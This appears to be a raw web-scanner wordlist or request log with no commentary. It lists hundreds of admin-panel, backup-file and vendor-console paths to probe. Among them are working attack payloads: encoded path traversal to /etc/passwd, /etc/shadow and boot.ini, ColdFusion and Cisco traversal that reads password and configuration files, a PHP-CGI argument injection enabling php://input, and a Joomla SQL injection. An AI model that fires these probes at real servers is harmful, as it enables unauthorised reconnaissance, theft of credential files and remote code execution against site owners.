%2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fboot%2Eini
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot%2Eini
%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd
%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd
%2F%2Fetc%2Fpasswd
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini
%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini
..\\..\\..\..\\..\..\\..\..\\\boot.ini
/
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%2fpasswd
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini
/..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini
/../../../../../../../../../../boot.ini
/../../../../../../../../../../etc/passwd
/../../../../../../../etc/passwd
/..\..\..\..\\..\..\\..\..\\\boot.ini
/..\/..\/..\/boot.ini
/..\/\..\/\..\/\boot.ini
/.git/HEAD
/.htaccess,/.htpasswd,/_vti_bin/,/_vti_cnf/,/_vti_log/,/_vti_pvt/,/_vti_txt/,/postinfo.html,/_vti_bin/_vti_aut/author.dll
/.svn/text-base/.htpasswd.svn-base,/.svn/text-base/Web.config.svn-base,/.git/HEAD,/.hg/requires,/.bzr/README,/downloadFile.php,/BackupConfig.php,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
///..%2f..%2f..%2f..%2fboot.ini
////..\..\..\boot.ini
//cmdownloads/?CMDsearch=%22.base64_decode%28%22amFsZnVqbm5rbW5hcXlr%22%29.%22
//_vti_inf.html
/4dm1n/,/account.asp,/admin/account.asp,/admin/index.asp,/admin/login.asp,/admin/admin.asp,/admin_area/admin.asp,/admin_area/login.asp
/5/,/6/,/7/,/8/,/9/,/10/,/a/,/b/,/c/
/852566C90012664F,/admin4.nsf,/admin5.nsf,/admin.nsf,/agentrunner.nsf,/alog.nsf,/a_domlog.nsf,/bookmark.nsf,/busytime.nsf
/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
/?q=/user/login
/accounting/,/active/,/activex/,/admcgi/,/admisapi/,/AdvWebAdmin/,/agentes/,/Agent/
/adm.html,/moderator/admin.html,/user.php,/account.html,/controlpanel.html,/admincontrol.html,/panel-administracion/login.php,/wp-login.php,/wp-json
/adm.php,/affiliate.php,/adm_auth.php,/memberadmin.php,/administratorlogin.php,/account.cfm,/admin/account.cfm,/admin/index.cfm,/admin/login.cfm
/adm/index.jsp,/adm.jsp,/adm_auth.jsp,/memberadmin.jsp,/administratorlogin.jsp,/siteadmin/login.jsp,/siteadmin/index.jsp,/admin1.php,/administr8.asp
/admin-login.asp,/admin/cp.asp,/cp.asp,/administrator/account.asp,/administrator.asp,/login.asp,/modelsearch/login.asp,/moderator.asp
/admin-login.html,/controlpanel.php,/admincontrol.php,/admin/adminLogin.html,/adminLogin.html,/home.html,/rcjakar/admin/login.php,/adminarea/index.html
/admin.cfm,/admin/admin_login.cfm,/admin_login.cfm,/adminpanel.cfm,/admin/controlpanel.cfm,/admincontrol.cfm,/panel-administracion/login.cfm,/admin/cp.cfm
/admin/admin-login.jsp,/admin-login.jsp
/admin/admin.aspx,/admin_area/admin.aspx,/admin_area/login.aspx,/admin_area/index.aspx,/bb-admin/index.aspx,/bb-admin/login.aspx,/bb-admin/admin.aspx,/admin/home.aspx
/admin/admin.cfm
/admin/admin/,/administrator/,/moderator/,/webadmin/,/adminarea/,/bb-admin/,/adminLogin/,/admin_area/
/admin/adminLogin.jsp,/home.jsp,/adminarea/index.jsp,/adminarea/admin.jsp,/adminarea/login.jsp,/panel-administracion/index.jsp,/panel-administracion/admin.jsp,/modelsearch/index.jsp
/admin/admin_login.aspx,/admin_login.aspx,/panel-administracion/login.aspx,/adminLogin.aspx,/admin/adminLogin.aspx,/home.aspx,/adminarea/index.aspx,/adminarea/admin.aspx
/admin/controlpanel.aspx,/admin.aspx,/pages/admin/admin-login.aspx,/admin/admin-login.aspx,/admin-login.aspx,/admin/cp.aspx,/cp.aspx,/administrator/account.aspx
/admin/controlpanel.php,/admincp/,/admincp/index.asp,/admincp/index.html,/admincp/login.php,/admin/account.html
/admin/cp.jsp,/cp.jsp,/administrator/account.jsp,/administrator.jsp,/login.jsp,/modelsearch/login.jsp,/moderator.jsp,/moderator/login.jsp
/admin/cp.php,/cp.php,/administrator/index.php,/administrator/login.php,/nsw/admin/login.php,/webadmin/login.php,/admin/admin_login.php,/admin_login.php
/admin/jscript/upload.html,/admin/jscript/upload.pl,/admin/jscript/upload.asp,/,/oozie/,/login.jsp,/about/,/cmf/login,/jobhistory
/admin/login.html,/admin/admin.html,/admin_area/index.php,/bb-admin/index.php,/bb-admin/login.php,/bb-admin/admin.php,/admin/home.php,/admin_area/login.html,/admin_area/index.html
/adminarea/admin.html,/webadmin.php,/webadmin/index.php,/webadmin/admin.php,/admin/controlpanel.html,/admin.html,/admin/cp.html,/cp.html,/adminpanel.php
/adminarea/index.asp,/adminarea/admin.asp,/adminarea/login.asp,/panel-administracion/index.asp,/panel-administracion/admin.asp,/modelsearch/index.asp,/modelsearch/admin.asp,/administrator/index.asp
/adminarea/login.aspx,/panel-administracion/index.aspx,/panel-administracion/admin.aspx,/modelsearch/index.aspx,/modelsearch/admin.aspx,/administrator/index.aspx,/admincontrol/login.aspx,/adm/admloginuser.aspx
/admincontrol/login.asp,/adm/admloginuser.asp,/admloginuser.asp,/admin2.asp,/admin2/login.asp,/admin2/index.asp,/adm/index.asp,/adm.asp
/admincp/index.aspx,/admincp/login.aspx,/admincontrol.aspx,/adminpanel.aspx,/webadmin.aspx,/webadmin/index.aspx,/webadmin/admin.aspx,/webadmin/login.aspx
/administr8.php,/administr8.jsp,/administr8.aspx,/administr8.cfm,/administr8/,/administer/,/administracao.php,/administracao.asp
/administracao.aspx,/administracao.cfm,/administracao.jsp,/administracion.php,/administracion.asp,/administracion.aspx,/administracion.jsp,/administracion.cfm,/administrators/
/administracion-sistema/,/Administracion/,/Admin/,/Administrator/,/Manager/,/Adm/,/systemadmin/,/AdminLogin.asp,/AdminLogin.php
/administrator.aspx,/login.aspx,/modelsearch/login.aspx,/moderator.aspx,/moderator/login.aspx,/administrator/login.aspx,/moderator/admin.aspx,/controlpanel.aspx,/user.aspx
/administrator/account.php,/administrator.php,/admin_area/admin.html,/pages/admin/admin-login.php,/admin/admin-login.php,/admin-login.php,/bb-admin/index.html,/bb-admin/login.html
/administrator/index.cfm,/modelsearch/admin.cfm,/panel-administracion/index.cfm,/adminarea/login.cfm,/adminarea/admin.cfm,/adminarea/index.cfm,/admin/adminLogin.cfm,/webadmin/login.cfm
/administrator/login.jsp,/moderator/admin.jsp,/controlpanel.jsp,/user.jsp,/admincp/index.jsp,/admincp/login.jsp,/admincontrol.jsp,/admin/account.jsp
/administrator/wp-login.php,/weblog/wp-login.php,/wp-admin/upgrade.php,/docs/,/store/docs/,/zencart/docs/,/cart/docs/,/docs/CHANGELOG.html
/AdminLogin.jsp,/AdminLogin.aspx,/AdminLogin.cfm,/admin108/,/pec_admin/,/system/admin/,/plog-admin/,/ESAdmin/
/adminLogin.php,/admin/adminLogin.php,/adminarea/index.php,/adminarea/admin.php,/adminarea/login.php,/panel-administracion/index.php,/panel-administracion/admin.php,/modelsearch/index.php
/adminpanel.html,/webadmin.html,/webadmin/index.html,/webadmin/admin.html,/webadmin/login.html,/admin/admin_login.html,/admin_login.html,/panel-administracion/login.html
/adminpanel.jsp,/webadmin.jsp,/webadmin/index.jsp,/webadmin/admin.jsp,/webadmin/login.jsp,/admin/admin_login.jsp,/admin_login.jsp,/panel-administracion/login.jsp,/adminLogin.jsp
/adminpro/,/admins/,/admins.cfm,/admins.php,/admins.jsp,/admins.asp,/admins.aspx,/maintenance/
/admin_area/index.asp,/bb-admin/index.asp,/bb-admin/login.asp,/bb-admin/admin.asp,/admin/home.asp,/admin/controlpanel.asp,/admin.asp,/pages/admin/admin-login.asp,/admin/admin-login.asp
/admin_area/index.jsp,/bb-admin/index.jsp,/bb-admin/login.jsp,/bb-admin/admin.jsp,/admin/home.jsp,/admin/controlpanel.jsp,/admin.jsp,/pages/admin/admin-login.jsp
/admloginuser.aspx,/admin2.aspx,/admin2/login.aspx,/admin2/index.aspx,/adm/index.aspx,/adm.aspx,/adm_auth.aspx,/memberadmin.aspx,/administratorlogin.aspx
/adm_auth.asp,/memberadmin.asp,/administratorlogin.asp,/siteadmin/login.asp,/siteadmin/index.asp,/account.aspx,/admin/account.aspx,/admin/index.aspx,/admin/login.aspx
/ads/www/admin/index.php,/adserver/www/admin/index.php,/splashfrog/,/pligg/,/vanilla/,/vanillaforum/,/vanillaforums/,/statusnet/,/xoda/
/Agents/,/AlbumArt_/,/AlbumArt/,/Album/,/allow/,/analog/
/ajaxfilemanager/,/upload/data/settings.cdb,/fm.php,/nagios3/cgi-bin/statuswml.cgi,/nagios3/,/test/logon.html,/cal_cat.php,/calendar/cal_cat.php
/anthill/,/apache/,/app/,/applets/,/appl/,/application/,/applications/,/applmgr/
/apply/,/appsec/,/apps/,/archive/,/archives/,/ar/,/asa/,/asp/,/atc/
/arcsight/,/arcsight/images/logo-login-arcsight.gif,/arcsight/images/navbar-icon-logout-on.gif
/atom.xml,/atom.jsp,/rss/,/rss.aspx,/rss.php,/rss.xml,/rss.jsp,/etc/passwd,/boot.ini
/aut/,/authadmin/,/auth/,/author/,/authors/,/aw/,/ayuda/,/b2-include/,/backend/
/axis2-admin/,/_sys/,/admin_cp.asp,/sitecore/admin/,/sitecore/login/admin/,/backup/,/backup,/backup.sql,/backup.sql.gz
/axis2/services/listServices
/backup.sql.bz2,/backup.zip,/backups/,/bak/,/back/,/cache/backup/,/admin/backup/,/dbbackup.txt,/b.sql
/bad/,/banca/,/banco/,/bank/,/banner01/,/banner/,/banners/,/bar/,/batch/
/bb-admin/admin.html,/admin/home.html,/modelsearch/login.php,/moderator.php,/moderator/login.php,/moderator/admin.php,/account.php,/pages/admin/admin-login.html,/admin/admin-login.html
/bb-admin/index.cfm,/bb-admin/login.cfm,/bb-admin/admin.cfm,/siteadmin/index.cfm,/memberadmin.cfm,/admin2/login.cfm,/admloginuser.cfm,/admincontrol/login.cfm
/bb-dnbd/,/bbv/,/bdata/,/bdatos/,/beta/,/billpay/,/bin/,/binaries/,/binary/
/blazeds/messagebroker/http
/blazeds/messagebroker/httpsecure
/blog/,/cms/,/comiccms/,/weblog/,/joomla/,/administrator/,/openx/www/admin/index.php,/www/admin/index.php
/blog/,/weblog/,/weblogs/,/wordpress/,/wiki/,/mediawiki/,/wiki/Main_Page,/tikiwiki/
/boadmin/,/boot/,/bottom/,/browse/,/browser/,/bsd/,/btauxdir/,/bug/,/bugs/
/bugzilla/,/buy/,/buynow/,/cached/,/cache/,/cache-stats/,/caja/,/card/,/cards/
/cal/cal_cat.php,/private/sdc.tgz,/cacti/,/cgi-bin/awstats.pl,/wiki/rankings.php,/reqdetails.php,/shared/help.php,/seti.php,/imc/
/cal_search.php,/a_viewusers.php,/aphpkb/,/webedition/we/include/we_modules/,/webedition/,/Examples/,/LightNEasy.php?do=login,/channel_detail.php,/cgi-bin/vcs
/cart/,/cash/,/caspsamp/,/catalog/,/cbi-bin/,/ccard/,/ccards/,/cd-cgi/,/cd/
/catalog.nsf,/certa.nsf,/certlog.nsf,/certsrv.nsf,/chatlog.nsf,/clbusy.nsf,/cldbdir.nsf,/clusta4.nsf,/collect4.nsf
/cdrom/,/ce_html/,/cert/,/certificado/,/certificate/,/cfappman/,/cfdocs/,/cfide/,/cgi-914/
/CFIDE/adminapi/administrator.cfc?method=login&adminpassword=&rdsPasswordAllowed=true
/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en
/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en
/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en
/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
/CFIDE/administrator/entman/index.cfm,/cfide/install.cfm,/CFIDE/administrator/archives/index.cfm,/CFIDE/wizards/common/_logintowizard.cfm,/CFIDE/componentutils/login.cfm,/CFIDE/Administrator/startstop.html,/common/help/en/go/login_ts.html,/system/login/
/cgi-915/,/cgi-auth/,/cgi-bin2/,/cgi-bin/,/cgibin/,/cgi.cgi/,/cgi-csc/,/cgi-exe/,/cgi/
/cgi-bin/mj_wwwusr,/majordomo/mj_wwwusr,/j2ee/examples/servlets/,/j2ee/examples/jsp/,/dsc/,/reg_1.htm,/adr.htm,/line_login.htm?l=1,/tbook.csv
/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/cgi-home/,/cgi-lib/,/cgilib/,/cgi-local/,/cgi-perl/,/cgi-scripts/,/cgiscripts/,/cgis/,/cgi-shl/
/cgi-shop/,/cgi-sys/,/cgi-weddico/
/cgi-win/,/cgiwin/,/class/,/classes/,/cliente/,/clientes/,/client/,/clients/
/client/VMware-viclient.exe,/en/welcomeRes.js,/citrix/,/Citrix/,/Citrix/MetaFrame/auth/login.aspx,/images/ctxHeader01.jpg,/images/Safeword_Token.jpg,/sw/auth/login.aspx
/clientaccesspolicy.xml
/cluster/cluster,/node,/databases/acidcat_3.mdb,/mdb-database/dblog.mdb,/db/users.mdb,/db/,/infusions/avatar_studio/avatar_studio.php,/bnnr.php,/vb/bnnr.php
/cm/,/cobalt-images/,/code/,/com/,/comments/,/common/,/communicator/,/company/,/comp/
/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server,/console/login/loginForm.jsp,/login_img.jpg,/cirronetlogo.gif,/browserId/wizardForm.jhtml,/webline/html/forms/callback.jhtml,/webline/html/forms/callbackICM.jhtml,/webline/html/agent/AgentFrame.jhtml
/compra/,/compras/,/compressed/,/conecta/,/conf/,/config/,/configs/,/configure/,/connect/
/console/,/contact/,/contacts/,/content/,/content.ie5/,/controlpanel/,/core/,/corp/,/correo/
/counter/,/credit/,/cron/,/crons/,/crypto/,/CS/,/csr/,/css/,/cuenta/
/crossdomain.xml
/cuentas/,/currency/,/cust/,/customer/,/customers/,/custom/,/CVS/,/cvsweb/,/cybercash/
/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\log\dbpwdChange.log,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb,/Info.live.htm,/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
/d/,/e/,/f/,/g/,/h/,/i/,/j/,/k/,/l/
/da.nsf,/dba4.nsf,/dclf.nsf,/DEASAppDesign.nsf,/DEASLog01.nsf,/DEASLog02.nsf,/DEASLog03.nsf,/DEASLog04.nsf
/darkportal/,/database/,/databases/,/datafiles/,/dat/,/data/,/dato/,/datos/,/db/
/db.sql,/ddb.sql,/users.sql,/database.sql,/mysql.sql,/dump.sql,/respaldo.sql,/data.sql,/old.sql
/dbase/,/dcforum/,/ddreport/,/ddrint/,/debug/,/debugs/,/default/,/deleted/,/delete/
/DEASLog05.nsf,/DEASLog.nsf,/decsadm.nsf,/decslog.nsf,/DEESAdmin.nsf,/dirassist.nsf,/doladmin.nsf,/domadmin.nsf,/domcfg.nsf
/demoauct/,/demomall/,/demo/,/demos/,/demouser/,/deny/,/derived/,/design/,/dev/
/devel/,/development/,/directories/,/directory/,/directorymanager/,/dir/,/dl/,/dm/,/DMR/
/digg/readme.html,/news/readme.html,/,/forum/,/site/,/website/,/store/,/webstore/,/comic/
/dms/README,/status/README,/statusnet/README,/twitter/README,/0/,/1/,/2/,/3/,/4/
/dms0/,/dmsdump/,/dms/,/dnn/,/doc1/,/doc/,/doc-html/,/docs1/,/docs/
/DocuColor/,/documentation/,/document/
/documents/,/dotnetnuke/,/down/,/download/,/downloads/,/dump/,/durep/,/easylog/
/domguide.nsf,/domlog.nsf,/dspug.nsf,/events4.nsf,/events5.nsf,/events.nsf,/event.nsf,/homepage.nsf,/iNotes/Forms5.nsf/$DefaultNav
/dotDefender/,/hop.php?/12345,/CSCOSSLC/config-auth,/actuator/,/auditevents/,/autoconfig/,/beans/,/configprops/,/env/
/dsp_page.cfm,/zikula/index.php,/system/admin/header.php,/system/admin/comments_items.php,/scripts/fckeditor/editor/filemanager/connectors/test.html,/scripts/fckeditor/editor/filemanager/connectors/uploadtest.html,/fckeditor/editor/filemanager/connectors/test.html
/editdocs.aspx,/workflowtasks/allitems.aspx,/lists/tasks/,/categories/allcategories.aspx,/categories/SOMEOTHERDIR/allcategories.aspx,/mycategories.aspx,/lists/,/lists/allitems.aspx
/editor/editor/filemanager/upload/test.html,/photogallery_open.php,/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx,/assetmanager/assetmanager.asp,/Final/login/ava_upl.php,/Final/login/ava_upl2.php,/spaw/demo.php,/admin/jscript/upload.php
/eforum/,/ejemplo/,/ejemplos/,/emailclass/,/email/,/employees/,/empoyees/,/empris/,/enter/
/envia/,/enviamail/,/error/,/errors/,/es/,/estmt/,/etc/,/etcpasswd/,/excel/
/example/,/examples/,/iissamples/,/j2eeexamples/,/j2eeexamplesjsp/,/sample/,/ncsample/,/fpsample/,/cmsample/
/exc/,/exchange/,/exchweb/,/exec/,/exe/,/exit/,/export/,/external/,/extranet/
/failure/,/fbsd/,/fcgi-bin/,/fcgi/,/features/,/fileadmin/,/file/,/filemanager/,/files/
/fckeditor/editor/filemanager/upload/test.html,/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html,/fckeditor/editor/filemanager/connectors/php/config.php,/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php,/includes/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp,/includes/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx,/includes/FCKeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm
/find/,/flash/,/foldoc/,/foobar/,/foo/,/form/,/forms/,/formsmgr/,/form-totaller/
/flex2gateway/http
/flex2gateway/httpsecure
/flexfm/,/lib/usermanagement/userInfo.php,/security/xamppsecurity.php,/system/console,/dm-albums/dm-albums.php,/ibm/console/logon.jsp?action=OK,/console/,/console/portal/0/Welcome
/flyway/,/health/,/healthcheck/,/healthchecks/,/loggers/,/liquibase/,/metrics/,/mappings/
/forum/bnnr.php,/weblink_cat_list.php,/,/UPGRADE.txt,/INSTALL.txt,/MAINTENERS.txt
/forum/docs/CHANGELOG.html,/forums/docs/CHANGELOG.html,/board/docs/CHANGELOG.html,/boards/docs/CHANGELOG.html,/changelog.txt,/tinymce/changelog.txt,/readme.html,/pligg/readme.html
/foto/,/fotos/,/fpadmin/,/fpclass/,/fpdb/,/fpe/,/framesets/,/frames/,/frontpage/
/frontend/x3/,/awstatstotals/awstatstotals.php,/awstats/awstatstotals.php,/awstatstotals.php,/awstats/index.php,/awstatstotals/index.php,/egroupware/,/calendar/cal_search.php
/ftp/,/ftproot/,/func/,/function/,/functions/,/fun/,/general/,/gfx/,/gif/
/gif/hp.gif,/gif/hp_invent_logo.gif,/gif/printer.gif,/hp/device/this.LCDispatcher,/hp/device/webAccess/index.htm,/PageSelector.class,/images/lexbold.gif,/images/lexlogo.gif
/gifs/,/global/,/globals/,/good/,/graphics/,/grocery/,/guestbook/,/guest/,/guests/
/globalSIPsettings.html,/SIPsettingsLine1.html,/websvn/,/repos/,/repo/,/svn/,/cvs/,/archiva/index.action,/index.action
/GXApp/,/HB/,/HBTemplates/,/helpdesk/,/help/,/hidden/,/hide/,/hitmatic/,/hit_tracker/
/happyaxis.jsp,/web-console/ServerInfo.jsp,/web-console/Invoker,/invoker/JMXInvokerServlet,/invoker/,/jmx-console/,/admin-console/,/CFIDE/administrator/enter.cfm
/help/../../etc/shadow
/hlstats/,/home/,/hosted/,/host/,/hostingcontroller/,/hosting/,/hp/,/htbin/,/htdocs/
/home.asp
/ht/,/htm/,/html/
/http/,/https/,/hyperstat/,/i18n/,/ibank/,/ibill/,/IBMWebAS/,/icons/
/HW_logo.html,/icons/icon_set_up_2701XX_01.gif,/icons/icon_homeportal_2701XX.gif,/es/images/nav_sl_home_network_01.gif,/en/images/nav_sl_home_network_01.gif,/images/stxx__xl.gif,/images/bbc__xl.gif,/HNAP1/
/icons/
/idea/,/ideas/,/I/,/iisadmin/,/image/,/images/,/imagenes/,/imagery/,/img/
/images
/images/logo-arcsight.gif,/logger/monitor.ftl,/beef/,/BEEF/,/beef/images/beef.gif,/gfx/form_top_left_corner.gif,/gfx/logout_24.png,/gfx/new_logo.gif
/images/printer.gif,/printer/image,/images/mute_alloff.gif,/images/pic_bri.gif,/scanweb/images/scanwebtm.gif,/view/index.shtml,/phpmyadmin/,/phpMyAdmin/
/imcws/,/partymgr/,/Base/upload.php,/Base/example_1.php,/YUI-upload/html,/tools/filemanager/skins/mobile/admin1.template.php,/Uploadify/,/syssite/
/img/cake.icon.png,/js/vendors.php,/cgi-bin/ffileman.cgi?,/fshow.php,/admin/upload.php
/imp/,/import/,/impreso/,/inc/,/include/,/includes/,/incoming/,/index/,/inet/
/includes/FCKeditor/editor/filemanager/browser/default/connectors/lasso/connector.lasso,/includes/FCKeditor/editor/filemanager/browser/default/connectors/perl/connector.cgi,/includes/FCKeditor/editor/filemanager/browser/default/connectors/py/connector.py,/FCKEditor/editor/filemanager/browser/default/connectors/test.html,/admin/includes/tiny_mce/plugins/tinybrowser/upload.php,/Backstage/Components/FreeTextBox/ftb.imagegallery.aspx
/index.php
/index.php/wp-json/wp/v2/posts/
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)
/inf/,/info/,/information/,/in/,/ingresa/,/ingreso/,/install/,/internal/,/internet/
/INSTALL.mysql.txt,/INSTALL.pgsql.txt,/update.php,/administrator/manifests/files/joomla.xml,/language/en-GB/en-GB.xml,/modules/custom.xml,/htaccess.txt,/templates/system/css/toolbar.css
/intranet/,/inventory/,/invitado/,/isapi/,/j2ee/,/japidoc/,/java/,/javascript/,/javasdk/
/iuaszvwssomliyvefjhc.htm
/javascript/sorttable.js,/images/btn_help_nml.gif,/images/hdr_icon_homeG.gif,/spControl.php,/images/isslogo.gif,/deploymentmanager/,/i18n/EN/css/foundstone.css,/i18n/EN/images/external_nav_square.gif
/javatest/,/jave/,/JBookIt/,/jdbc/,/job/,/jrun/,/jsa/,/jscript/,/jserv/
/jmx-console/
/joomla/administrator,/login.php,/admin_area/admin.php,/admin_area/login.php,/siteadmin/login.php,/siteadmin/index.php,/siteadmin/login.html,/admin/index.html
/jotter.nsf,/leiadm.nsf,/leilog.nsf,/leivlt.nsf,/log4a.nsf,/log.nsf,/l_domlog.nsf,/mab.nsf
/js/,/jslib/,/jsp/,/junk/,/kiva/,/known/,/labs/,/lcgi/,/lib/
/kbcat.cgi,/workorder/FileDownload.jsp,/sd/workorder/FileDownload.jsp,/sections/reference.inc.php,/store.php?action=view_cart,/catalog/main.php?cat_id=,/index.php?cat_id=1,/forum_answer.php?que_id=1
/lcds-samples/messagebroker/http
/lcds-samples/messagebroker/httpsecure
/lcds/messagebroker/http
/lcds/messagebroker/httpsecure
/libraries/,/library/,/libro/,/license/,/licenses/,/links/,/linux/,/loader/,/local/
/Listadeparametros.html
/lists/default.aspx,/lists/allposts.aspx,/lists/archive.aspx,/lists/byauthor.aspx,/lists/calendar.aspx,/lists/mod-view.aspx,/lists/myposts.aspx,/lists/my-sub.aspx,/lists/allcomments.aspx
/lists/mycomments.aspx,/_layouts/userdisp.aspx,/_layouts/help.aspx,/_layouts/download.aspx,/projectserver/Home/HomePage.asp,/projectserver/images/branding.gif,/projectserver/images/pgHome.gif,/projectserver/images/pgTask.gif
/location/,/locations/,/logfile/,/logfiles/,/logger/,/logg/,/logging/,/logon/,/logout/
/log.aspx,/log.jsp,/logs/,/logs.htm,/logs.php,/logs.asp,/logs.aspx,/logs.jsp
/login.stm,/tools_admin.php,/bsc_lan.php,/Manage.tri,/logo_t.gif,//system.html,/main_configure.cgi,/OvCgi/Toolbar.exe
/lost+found/,/mailman/,/mailroot/,/makefile/,/manage/,/management/,/man/,/manual/,/map/
/Lotus_Domino_Admin/,/hpwebjetadmin/,/_admin/,/_administrator/,/_administrador/,/_admins/,/_administrators/,/_administradores/,/_administracion/
/m/,/n/,/o/,/p/,/q/,/r/,/s/,/t/,/u/
/mail10.box,/mail1.box,/mail2.box,/mail3.box,/mail4.box,/mail5.box,/mail6.box,/mail7.box,/mail8.box
/mail9.box,/mail.box,/msdwda.nsf,/mtatbls.nsf,/mtstore.nsf,/names.nsf,/nntppost.nsf,/nntp/nd000001.nsf,/nntp/nd000002.nsf
/manual/
/maps/,/marketing/,/member/,/members/,/mem_bin/,/mem/,/message/,/messaging/,/metacart/
/messagebroker/http
/messagebroker/httpsecure
/microsoft/,/misc/,/mkstats/
/mod/,/module/,/modules/,/movimientos/,/mpcgi/,/mqseries/,/msfpe/,/ms/
/modelsearch/admin.jsp,/administrator/index.jsp,/admincontrol/login.jsp,/adm/admloginuser.jsp,/admloginuser.jsp,/admin2.jsp,/admin2/login.jsp,/admin2/index.jsp
/modelsearch/admin.php,/admincontrol/login.php,/adm/admloginuser.php,/admloginuser.php,/admin2.php,/admin2/login.php,/admin2/index.php,/adm/index.php
/modelsearch/index.cfm,/panel-administracion/admin.cfm,/adm/admloginuser.cfm,/adm.cfm,/adm_auth.cfm,/administratorlogin.cfm,/webadmin.cfm,/webadmin/index.cfm
/modelsearch/login.cfm,/login.cfm,/administrator.cfm,/administrator/account.cfm,/adminLogin.cfm,/siteadmin/login.cfm,/admin2/index.cfm,/adm/index.cfm,/admin_area/index.cfm
/moderator.html,/administrator/index.html,/administrator/login.html,/user.html,/administrator/account.html,/administrator.html,/login.html,/modelsearch/login.html
/moderator/login.asp,/administrator/login.asp,/moderator/admin.asp,/controlpanel.asp,/user.asp,/admincp/login.asp,/admincontrol.asp,/adminpanel.asp,/webadmin.asp
/moderator/login.html,/adminarea/login.html,/panel-administracion/index.html,/panel-administracion/admin.html,/modelsearch/index.html,/modelsearch/admin.html,/admincontrol/login.html,/adm/index.html
/msql/,/Msword/,/mxhtml/,/mxportal/,/my/,/My%20Shared%20Folder/,/mysql_admin/,/mysql/,/name/
/mxportal/home/en_US/servicetools.gif,/mxportal/home/MxPortalFrames.jsp,/xymon/menu/menu.css,/rrc.htm,/manager/html/upload,/manager/html,/axis2/axis2-web/HappyAxis.jsp,/axis2/
/names/,/ncadmin/,/nchelp/,/netbasic/,/netcat/,/NetDynamic/,/NetDynamics/,/net/,/netmagstats/
/na_admin/styles/dfm.css,/lib/db/install.xml,/lib/thirdpartylibs.xml,/local/readme.txt,/README,/README.txt,/xoda/README,/docs/README,/documents/README
/netscape/,/netshare/,/nettracker/,/network/,/new/,/news/,/News/,/nextgeneration/,/nl/
/NETWARE.HTM,/setup.cgi,/debug.cgi,/ehcp/?op=applyforftpaccount,/ehcp/?op=applyforaccount,/ehcp/?op=applyfordomainaccount,/vhosts/ehcp/?op=applyforftpaccount,/vhosts/ehcp/?op=applyforaccount
/nmaplowercheck1645205128
/nntp/nd000003.nsf,/ntsync45.nsf,/perweb.nsf,/qpadmin.nsf,/quickplace/quickplace/main.nsf,/reports.nsf,/sample/siregw46.nsf,/schema50.nsf
/noindex/css/bootstrap.min.css
/noindex/css/bootstrap.min.css?call=test
/noindex/css/bootstrap.min.css?callback=test
/noindex/css/bootstrap.min.css?cb=test
/noindex/css/bootstrap.min.css?jcb=test
/noindex/css/bootstrap.min.css?jsonp=test
/noindex/css/bootstrap.min.css?jsonpcallback=test
/noindex/css/open-sans.css
/noindex/css/open-sans.css?call=test
/noindex/css/open-sans.css?callback=test
/noindex/css/open-sans.css?cb=test
/noindex/css/open-sans.css?jcb=test
/noindex/css/open-sans.css?jsonp=test
/noindex/css/open-sans.css?jsonpcallback=test
